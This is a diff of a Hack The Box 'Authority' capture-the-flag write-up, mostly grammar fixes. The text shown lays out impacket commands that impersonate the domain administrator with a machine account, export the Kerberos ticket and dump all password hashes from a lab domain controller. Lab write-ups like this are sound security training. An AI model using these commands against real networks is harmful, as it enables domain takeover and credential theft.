Cal1c0/cal1c0.github.io/_posts/2023-10-28-HTB_Authority_writeup.markdown

 ![Successfully added](/assets/img/Authority/Authority_12.png)

-So now that we upgraded our account to being allowed to impersonate users on the domain controller the next step is to request a tgt with our machine account.
+So now that we upgraded our account to being allowed to impersonate users on the domain controller, the next step is to request a tgt with our machine account.
 We can do this by using the following impacket command.

 ```bash
 impacket-getST -spn ldap/authority.authority.htb -impersonate administrator -dc-ip 10.10.11.222 'authority.htb/CALICO$:lDaP_1n_th3_cle4r!'
 ```

 If you get an error **Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)**: This is because Kerberos is a very sensitive protocol when it comes to timing. our machine and the target need to have the same time.
-We can fix this by syncing our time to the target machine's.
+We can fix this by syncing our time to the target machines.

 ```
 sudo ntpdate 10.10.11.222
 ```

-After running the impacket command we'd get a valid kerberos ticket
+After running the impacket command we get a valid kerberos ticket:

 ![Kerberos Ticket acquired](/assets/img/Authority/Authority_13.png)

-next step for ease of use i move the ticket to the tmp directory and set my **KRB5CCNAME** to this file's location.
+For ease of use I moved the ticket to the tmp directory and set my **KRB5CCNAME** to this file's location.
 We need to do this to be able to use commands using kerberos authentication.

 ```bash
 cp administrator.ccache /tmp/
 export KRB5CCNAME=/tmp/administrator.ccache
 ```

-So seeing that we have a valid kerberos ticket we can now use this in combination with secrets dump to dump all hashes from the domain controller
+So seeing that we have a valid kerberos ticket, we can now use this in combination with secrets dump to dump all hashes from the domain controller.

 ```bash
 impacket-secretsdump  'authority.htb/administrator@authority.authority.htb' -k -no-pass -dc-ip 10.10.11.222 -target-ip 10.10.11.222